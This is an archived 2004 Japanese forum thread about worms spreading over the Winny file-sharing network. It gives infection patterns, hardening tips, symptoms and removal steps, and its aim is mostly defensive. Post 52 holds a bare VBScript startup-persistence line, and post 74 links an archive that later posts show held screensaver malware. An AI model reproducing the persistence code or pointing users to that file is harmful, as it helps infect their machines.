5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【警報】Winnyを狙ったワーム・ウイルス情報 Part24

1 :[名無し]さん(bin+cue).rar:04/08/09 22:39 ID:JnP1QAAj
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc

■流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg         .exe」等)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part23
http://tmp4.2ch.net/test/read.cgi/download/1091063187/l50

テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/

2 :[名無し]さん(bin+cue).rar:04/08/09 22:39 ID:hpc4DwsZ


3 :[名無し]さん(bin+cue).rar:04/08/09 22:39 ID:JnP1QAAj
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは】
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】
【Winny歴、総DL量は】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】

4 :[名無し]さん(bin+cue).rar:04/08/09 22:41 ID:JnP1QAAj
■推奨無視リスト
このままIgnore.txtにコピペしてください。

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。

5 :[名無し]さん(bin+cue).rar:04/08/09 22:41 ID:x5x8GFwI
>>1


最近出てきた壁紙やスクリーンセーバー勝手に起動時に変える奴も追加してくれ

6 :[名無し]さん(bin+cue).rar:04/08/09 22:42 ID:JnP1QAAj
■感染しないための注意1 〜やっておくべき設定等〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・シングルクリックをダブルクリックにしてうっかり操作防止。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorun(自動実行)は切っておく。(やり方は以下参照)
・適切な無視リストの設定などで、そもそもウイルスを呼び込まない。(リストは以下参照)
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
 (フォルダ名と同じファイルは置けないのである程度防止になる)
・WhiterVBS簡易チェッカーを使う。
 ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
 (拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
 ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
・フォルダアイコン、txtアイコンを標準のものから変更しておく。
  (アイコンを偽装したexeを見分けるため。aviやヘルプなど他の拡張子も変更が望ましい)
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
 ※アプリケーションのインストール時に弊害が起こることもあるので注意。

7 :[名無し]さん(bin+cue).rar:04/08/09 22:42 ID:JnP1QAAj
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・解凍ソフトはWinRARなど中身を確認できるアーカイバを使う
・lzh,zip,rarなど圧縮ファイルは解凍後も要注意。
・exeファイルの実行は完全自己責任。
・CDイメージ(CCD等)はautorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
 ttp://p46.aaacafe.ne.jp/~nydb/

CD/DVDドライブのAutorun(自動実行)の切り方
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000、XPの場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※また窓の手などでソフトでも簡単にオフに出来る。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。

8 :[名無し]さん(bin+cue).rar:04/08/09 22:43 ID:JnP1QAAj
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 に名前xxx データC:\Program Files\xxx\xxx.exeが登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
・etc.(亜種により様々)
■活動内容(亜種毎に違います)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
 (例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\xxx\xxx.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
・今回に関わらず、落とした.exeファイルの実行は控える。
■まとめサイト
ttp://www.geocities.jp/kim_virus/
ttp://myui.s53.xrea.com/kin/index.html
ttp://chiakis-web.hp.infoseek.co.jp/kintama-v/

9 :[名無し]さん(bin+cue).rar:04/08/09 22:43 ID:JnP1QAAj
★流行種その2
【Antinny.ms(仮称)】
 Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
 ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
 (Systemフォルダにあるsvchost.exeは問題ありません)
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の自動実行を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子はms???.exe(248k)。親はms???.exe(282k)
 (子を消しても、再起動すると親が子を再度作成する)
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■対策
1. 親のファイル名が含まれるレジストリキーを削除。
  Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
  (Win9X、MEの場合は不明)
2. セーフモードで再起動し、親子ともどもファイルを削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
  HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
  バスターはPCCTool.exeを使えば再インスコせずに済む。

10 :[名無し]さん(bin+cue).rar:04/08/09 22:44 ID:JLw2iy4L
★流行種その3
【Autorun+bat】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■活動内容(版により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
 (削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)起動をatコマンドでスケジュールする。
・壁紙のエロCGへの変更(画面のプロパティでの修正は不可)
■駆除方法(版により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
・exeの実行は自己責任で行う。あまりアンチウイルスソフトは役に立たない。

11 :[名無し]さん(bin+cue).rar:04/08/09 22:45 ID:+MUMabNN
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染の模様。
■症状(感染確認方法)
・ny起動すると画面が真っ黒になり
 赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャを起動できないようにする。(情報錯綜)
■活動内容
・C:\WINNT\Web\Wallpaperのフォルダが開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
 [任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
 私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」ができてる。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe" 22,528Byteができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルを3つ?作る。
・そのexeファイル名はシステムに使用されるものをランダムに使用の模様。
 (報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)  
・レジストリに以下を追加し、起動時の自動実行が設定される。
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下も追加、作用は不明?値はGalaxian Explosion
 HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■対策
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexe削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで怪しいキー削除。

12 :[名無し]さん(bin+cue).rar:04/08/09 22:46 ID:9AJWwlgh
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは】
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】
【Winny歴、総DL量は】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】


13 :[名無し]さん(bin+cue).rar:04/08/09 22:46 ID:2HqaJvvL
とりあえずたてた
後は適当にやってくれ

14 :[名無し]さん(bin+cue).rar:04/08/09 22:50 ID:YqVCrzzT
>>13

お疲れ様です。

15 :[名無し]さん(bin+cue).rar:04/08/09 22:52 ID:shuVBeDx
>>13
乙!
ところで、他スレとかも読んでて思うのだが、夏厨が質問しにくるのは
まだマシで、夏厨がちょっと知識を得て回答者になりだすと、もうなに
なんやらワケわからん状況になるな・・・orz

16 :[名無し]さん(bin+cue).rar:04/08/09 22:52 ID:uYtM8tCx
>>1

天麩羅の中の人も乙

17 :前回975:04/08/09 22:52 ID:9AJWwlgh
スレ立てお疲れです

>各ベンダーが4月の時点で対応完了しているAntinny.Gに
>今更引っかかるようなヤツは残念ながら同情の余地が無い。
>そもそもAntinny.Gは確かにゾロ目の日に破壊活動を行うが、
>それ以外の日でも血しぶきエフェクトだけは出ていたはずだが。
>支障が無いからといってそれすら放置してたのか?

たしかに血しぶきが出ていたような
しかもここ2.3日1ヶ月体験版が切れて
winnyは、ノートパソコンの方でしているので
ウイルスチェックしてokだったものを
ディスクトップで使っていたので

しかしこのウイルスの正式名が出ていないけど
txt ぬるぼとか
jpgが見られないようになるというウイルス名が
出ていないけど新種なのかなあと思ってしまいます。

だって検索で昨日探した限り被害者が7/7に他の掲示板に書き込み以外
あとはいなかったので...

まあ今後はDVDバックアップなどして、
楽しいパソコンライフつづけます。
winnyは、多分ウイルスバスター正規版を買ってやりつづけると思いますが「wA

18 :[名無し]さん(bin+cue).rar:04/08/09 23:04 ID:wnzB74ij
ただのキンタマ亜種
前の書き込みが7/7っていうなら、おまえのようにゾロ目の日に発病したやつが
書き込んだだけ

破壊活動を行ったのが8/8というだけで
それまでずっと飼ってて、nyに自分の情報を垂れ流しにしたんだろうね

19 :[名無し]さん(bin+cue).rar:04/08/09 23:06 ID:shuVBeDx
>>17
ウイルスの名前なんて各ベンダーがテキトーにつけてるわけで、
正式名称なんてないでしょ。
似たような名称になるよう多少は気を使っているらしいですが、
昔はもっとバラバラだったらしい。
マスコミとか賑わすような強力な奴は、自然にというかマスコミが
使う名称に統一されますが。


20 :[名無し]さん(bin+cue).rar:04/08/09 23:08 ID:5mo45PMr
キンタマに感染しててもWinny自体稼動させなければ基本的には流れないってことでいい?

21 :[名無し]さん(bin+cue).rar:04/08/09 23:14 ID:qNLUWKB6
>>1


22 :[名無し]さん(bin+cue).rar:04/08/09 23:16 ID:idc8gFID
なんか前スレの終りらへん
すごい暗いYO〜(・∀・)

23 :[名無し]さん(bin+cue).rar:04/08/09 23:23 ID:sAh8iBZd
全角厨はアンチウィルスソフト入れても、またny関連のウィルスの餌食になると思うYO

24 :[名無し]さん(bin+cue).rar:04/08/09 23:26 ID:x5x8GFwI
★流行種その4の亜種について情報求む

ウィルスのファイル名:〜.scr
症状:パソコンを起動するたびに壁紙が自動的に変わる、ctr+alt+deleteができなくなる
    スクリーンセーバー(仮称)と違いフォルダや偽装exeの類を作らない(スタートアップにもファイルを作らない)

25 :[名無し]さん(bin+cue).rar:04/08/09 23:47 ID:SfYv1QKB
過去スレ
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187


26 :[名無し]さん(bin+cue).rar:04/08/10 00:41 ID:Tve5b7F+
ところでなんだが、落とした圧縮ファイル開いたら『送信』ってファイルと無数のメールアドレスがあった。
これは危ないやも・・・?
と思い、展開せずに消そうと思ったが・・・習慣とは恐ろしいもの。
普段通り解凍してましたよ、ええ。

ここで質問。
それで展開したファイルを見てみたんだが、送信と言うファイル(拡張子は忘れた)は表示されていなかった。
これは載っていたメールアドレスに何かが送信されたと考えてOK?



あと、テンプレに無いみたいだか言いたいんだが・・・。
ダミーのwinnyの設置とかはウイルス対策に感染後の対策として入れといた方がいいと思うんだが・・・。


27 :[名無し]さん(bin+cue).rar:04/08/10 00:42 ID:nMgUlCl2
自分でページ作ってみれば?
誘導貼れるし。

28 :[名無し]さん(bin+cue).rar:04/08/10 00:57 ID:iqVufLeX
>>26
『送信』ファイルってのが実は圧縮ファイルで、解凍したときに
それごと開いたので、送信ファイルが無くなってたということは
考えられる。実際にメールが送信されたかどうかは、ワカンネ。

29 :[名無し]さん(bin+cue).rar:04/08/10 01:13 ID:YXmt9ejK
>26
『送信』ってファイルの拡張子は?

30 :[名無し]さん(bin+cue).rar:04/08/10 01:50 ID:xaJ8ipCg
>>29
拡張子が忘れたって書いてあるし、解凍して送信ファイル
がなかったから、分からないとオモワレ
【Autorun+bat】 の田代砲と関係しているのかもと思ったり。

>>26
というか、質問テンプレに沿って、質問しようよ。
何か、テンプレも見てない奴だと思われるよ。

31 :[名無し]さん(bin+cue).rar:04/08/10 01:52 ID:Tve5b7F+
>>29
だから忘れたと・・・と言おうかと思ったけど、調べてくれそうだったので再DLして調べた。
えっと、tocとmbx。
後、『受信』ってファイルもある。(拡張子は『送信』と同じ)
色々深い所まで行ってみたら脱税用とか推薦書とか講義者とかいう意味のわからないテキストファイルまである。

・・・単なるフェイクかな?
もしくはキンタマ詰め合わせzipの名前だけ書き換えたとか・・・。

32 :[名無し]さん(bin+cue).rar:04/08/10 02:00 ID:Tve5b7F+
>>30
正直スマンかった・・・。
では改めて・・・
【使用OS】XP
【WindowsUpdateしてるか】してる
【AntiVirusは】邪魔だからアンインスコした
【ちゃんとUpdateしてるか】してない
【スキャンした結果】
【オンラインスキャンしたならその結果は】ウイルス無し
【Winnyのバージョン】2.71b
【Winny歴、総DL量は】1年前後  総DL量はわからない
【テンプレを読んだか】熟読
【テンプレにある対策を実行したか】一応全てチェックした
【症状か具体的に、分かる限りすべて書く】
解凍時にファイルの中にあった『送信.toc』『送信.mbx』というファイルが解凍後消滅。
同ファイルの中に無数のメールアドレスがあったので不安。
【何をしたらそんなことになったのか】怪しいファイルの解凍
【これまでにとった措置】放置中・・・


33 :[名無し]さん(bin+cue).rar:04/08/10 02:09 ID:9l61N629
>>31
mbx
http://www.google.co.jp/search?q=mbx+%E6%8B%A1%E5%BC%B5%E5%AD%90&ie=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

toc
http://www.google.co.jp/search?hl=ja&ie=UTF-8&q=toc%E3%80%80%E6%8B%A1%E5%BC%B5%E5%AD%90&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

テンプレ読まないし、ググらないし、グデグデだな。
ついでだ
http://jisyo.com/viewer/

34 :[名無し]さん(bin+cue).rar:04/08/10 02:10 ID:G0aN7vyr
>>31
それは、誰かがキンタマ踏んで公開しちゃったヤツではないのか。
解凍後消滅したように見えて、自分のOutlookかなんかのファイルが
上書きされてる可能性は? 例の解凍パス偽装で?


35 :[名無し]さん(bin+cue).rar:04/08/10 02:16 ID:nycvfSUY
ただのキンタマ感染者の残骸だろ

36 :[名無し]さん(bin+cue).rar:04/08/10 02:30 ID:YXmt9ejK
ファイルの内容から言って、何か影響があるとしたらOutlookExpressあたりだろう

37 :[名無し]さん(bin+cue).rar:04/08/10 02:58 ID:aPdC416d
PC板で煽られてしまったのでこちらでお願いします。

ノートPCに感染した時限式のウィルス(ヌルポウィルス?
PCを起動すると「あぼ〜ん」と表示されていくつかのファイルと
ウィンドウズを認識・起動させるのに必要なファイルが削除されてしまいました。
外付けHDDを経由してデスクトップのほうから持ってこようと思うのですが
必要なファイルの名前がわかりません。
以前に発動したときには、確かファイル3つほど入れれば解決したと思うのですが
そのまま放置しておいたらまた発動してしまいまして・・・
心当たりありましたら教えていただけないでしょうか?

38 :[名無し]さん(bin+cue).rar:04/08/10 03:07 ID:GjL9y0sU
(´゚c_,゚` )プッ

39 :[名無し]さん(bin+cue).rar:04/08/10 03:11 ID:ilZhA9LY
(´゚c_,゚` )ペッ

40 :[名無し]さん(bin+cue).rar:04/08/10 03:17 ID:kqWlAl7z
>>37
( Д)  ゚ ゚

41 :[名無し]さん(bin+cue).rar:04/08/10 03:19 ID:MjHZw0iZ
>>37は( ∵人∵)オシリース

42 :[名無し]さん(bin+cue).rar:04/08/10 03:40 ID:c+qKjhfZ
そのまま放置…

43 :[名無し]さん(bin+cue).rar:04/08/10 03:46 ID:HWBTDrqN
>そのまま放置しておいたらまた発動してしまいまして・・・

誰も教えてくれん罠('A`)

44 :[名無し]さん(bin+cue).rar:04/08/10 03:50 ID:GjL9y0sU
ID変えたってことは何かい?
>>39>>37ってことかよ!?

45 :[名無し]さん(bin+cue).rar:04/08/10 04:03 ID:Dmr9+NZL
>>37
何を移せば良いか判らないのか
では逆にコチラから質問つ^か情報提示要求

何が消されたか教えてくれや
それが判らんと何を移したら良いか皆目見当も付かんw

46 :37:04/08/10 04:09 ID:aPdC416d
情報不足でした。申し訳ありません。
スタート→プログラムは空になっていてオフィス等も全滅です。
デスクトップのアイコンは概ね機能しなくなりIEも動きません。
あとはシステム関連のファイルですが何が消えたのやら・・・

Windows を正しく動作させるために必要なファイルが、
認識できないバージョンのファイルに置き換えられています。
システムの安定を維持するために、
これらのファイルを元のバージョンに復元する必要があります。

というセキュリティ保護は表示されているのですが。

47 :[名無し]さん(bin+cue).rar:04/08/10 04:43 ID:kG+/WkcH
>>46
俺は親切だから教えてやる。
フォーマットしてインストしなおせ。
これ以上の質問は受け付けません。

48 :45:04/08/10 05:10 ID:Dmr9+NZL
>>46
つまり何が消えて何が残ってるか判らないって事だな?

だったら>>47の言う通り再インスコしか手は無いな
上書きとかすんなよ、「何」が残ってるか判んねーんだから

フォーマットしてクリーンインスコ、これ最強

49 :[名無し]さん(bin+cue).rar:04/08/10 11:34 ID:JJMZkxsp
なんかここ見てると新種・亜流の発生頻度が上がってるような
writer系の凶悪なもの(キンタマも十分凶悪だが)はこれまでなかっただけによけいにそんな気になる


50 :[名無し]さん(bin+cue).rar:04/08/10 12:07 ID:do017Ycw
実際には検出不能な新種や亜種にかかってる人間はそれほどいない。
ここに被害報告してる人間の8割方は
本来対策をしてれば問題無いはずの従来のウィルスにいまだに引っかかってる連中。

51 :[名無し]さん(bin+cue).rar:04/08/10 12:14 ID:Qlm3qXyY
>>49
最近出た亜種は嫌がらせ程度のことしかひないから(壁紙を蓮コラにするとか)あんま心配しなくていいかも

52 :[名無し]さん(bin+cue).rar:04/08/10 12:50 ID:sfKWj7YF
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

53 :[名無し]さん(bin+cue).rar:04/08/10 12:52 ID:/3Ti8tDV
すいませんが、ここのテンプレを読んだので
いまだに、ny系のウィルスにひっかかったことないんですが?
どうして、こんなにひっかかる人が多いのですか?

54 :[名無し]さん(bin+cue).rar:04/08/10 12:58 ID:Qlm3qXyY
l
J

55 :[名無し]さん(bin+cue).rar:04/08/10 13:06 ID:y11WMivt
>>53
世の中にはアナタが想像する以上に迂闊な人が多いから。

56 :[名無し]さん(bin+cue).rar:04/08/10 13:12 ID:sfKWj7YF
ܲ

57 :[名無し]さん(bin+cue).rar:04/08/10 13:20 ID:yLq/J9UT
世の中の人の80%はうっかり八兵衛でできています

58 :[名無し]さん(bin+cue).rar:04/08/10 13:27 ID:OOGBKTw2
今回の圧縮ファイル解凍でスタートアップに登録ってのはかなりの人数が喰らってると思われ

59 :[名無し]さん(bin+cue).rar:04/08/10 13:28 ID:uPBPVSFQ
感染してもnyにつながなきゃ大丈夫だよね?

60 :[名無し]さん(bin+cue).rar:04/08/10 13:33 ID:kP8BJEVG
「AIDSに感染しても、SEXしなきゃ平気だよね?」
と言ってるのと同じだぞ。................................................たまには釣られてやるよ

61 :[名無し]さん(bin+cue).rar:04/08/10 13:35 ID:uNfkLevx
>>58
普通解凍する前に確かめるでしょう

62 :[名無し]さん(bin+cue).rar:04/08/10 13:37 ID:TAgFQPhP
>>58
今回のは圧縮ライブラリ(仕様?)の脆弱性をうまく使ってるよな。
注意してるやつにはなんてことないけど、うっかり八兵衛や初心者にとっ
てはクリティカルヒット。

他にも解凍されたらヤバいディレクトリとかあったっけ?

63 :[名無し]さん(bin+cue).rar:04/08/10 13:43 ID:2ZwSYOtu
スタートアップに勝手に入れられて実行されそうになったらちゃんと警告してくれるソフトを入れるべき。

64 :[名無し]さん(bin+cue).rar:04/08/10 13:55 ID:sj8zNgDB
>>63

具体的なソフト名を書けよ。
「そんなソフトがあったらいいな」、なんて憶測で思っているだけなら、書かない方がいい。
意味無いので。


65 :[名無し]さん(bin+cue).rar:04/08/10 13:58 ID:2ZwSYOtu
おれはSSM使ってる。
詳しくはこちら
【FWと併用】System Safety Monitor
http://pc5.2ch.net/test/read.cgi/sec/1061788093/

66 :[名無し]さん(bin+cue).rar:04/08/10 13:59 ID:MsKQ7Emv
>>64
( ´∀`)アホきたモナー

67 :[名無し]さん(bin+cue).rar:04/08/10 14:23 ID:gp3gjbvK
>64
( ^д^)ギャハ

ageてるしホント、しょーもねーなー

68 :64:04/08/10 14:24 ID:sj8zNgDB
 ||
      .__||_
      |__し
     (ハ⌒ヽ
     | |   |
     ∪   |
      |__|
      ∪∪

69 :[名無し]さん(bin+cue).rar:04/08/10 14:31 ID:2ZwSYOtu
いや、普通はここまでする必要ないから知らない人も多いだろ。
だから吊るなよ。

70 :[名無し]さん(bin+cue).rar:04/08/10 14:32 ID:yLq/J9UT
>>68
イキ                                なくてよろし.exe

71 :[名無し]さん(bin+cue).rar:04/08/10 14:36 ID:HWBTDrqN
>>64 ここぞとばかりにageたんだな まぁなんだ ゐ`

72 :[名無し]さん(bin+cue).rar:04/08/10 14:50 ID:X4LAcyhv
>>64
( ´,_ゝ`)プッ

73 :[名無し]さん(bin+cue).rar:04/08/10 15:56 ID:QELJgMa2
>>64たん(;´Д`)ハァハァ

74 :[名無し]さん(bin+cue).rar:04/08/10 16:02 ID:Qlm3qXyY
ttp://tool-ya.ddo.jp/2ch/trash-box/contents.jsp?file=20040809192445011.zip
こいつの対処法教えて

75 :[名無し]さん(bin+cue).rar:04/08/10 17:13 ID:HWBTDrqN
zip info: local extra (122 bytes) != central extra (17 bytes): おまけ ミサのスクリーンセーバー .scr
zip diagnostic: including おまけ ミサのスクリーンセーバー .scr
deleting: おまけ ミサのスクリーンセーバー .scr
zip warning: zip file empty
total bytes=0, compressed=0 -> 0% savings


中身のexeは例のSS型かね 消去しちまったが

76 :[名無し]さん(bin+cue).rar:04/08/10 17:18 ID:HWBTDrqN
exeじゃねぇな・・・_| ̄|○ 何いってんだ俺は

77 :[名無し]さん(bin+cue).rar:04/08/10 17:20 ID:9l61N629
>>57
ワロタ
というか、落としたファイルの中も見ないで解凍する香具師の気が知れん。

78 :[名無し]さん(bin+cue).rar:04/08/10 20:33 ID:MQP8YS7W
>>77
普通のサイトで落としたエロサンプル動画を解凍する要領で、解凍してるんだろ。

79 :[名無し]さん(bin+cue).rar:04/08/10 21:43 ID:BMSLBZcT
>>75
このことじゃない?
24 :[名無し]さん(bin+cue).rar :04/08/09 23:26 ID:x5x8GFwI
★流行種その4の亜種について情報求む

ウィルスのファイル名:〜.scr
症状:パソコンを起動するたびに壁紙が自動的に変わる、ctr+alt+deleteができなくなる
    スクリーンセーバー(仮称)と違いフォルダや偽装exeの類を作らない(スタートアップにもファイルを作らない)


俺も間違って>>74開いちまって同じ症状だから間違いない!orz

80 :[名無し]さん(bin+cue).rar:04/08/10 21:45 ID:7VZmTxfb
ガムをクチャクチャ噛んでたら、普段俺のことキモイとか言って避けてる女が寄ってきて
「私にもガムちょうだい」って言ってきやがった。かなりむかついたんで、女の首根っこ掴
んで口移しで自分の噛んでるガムをやるフリをしてやった。殴られるか、悲鳴をあげられ
るか、どうでもいいが二度と近寄るなと思った。ところが、驚いたことにその女は目を閉じ
て唇を少し開いたんだ。俺の方がビビッて、あわててちょっと離れた。しばらくの間があった
後、その女は、「マジでするのかと思った」と小声で言って、ガムを奪って走り去った。
それから何日か後、その女がキャンディーを食ってたので今度は俺の方からひとつくれ
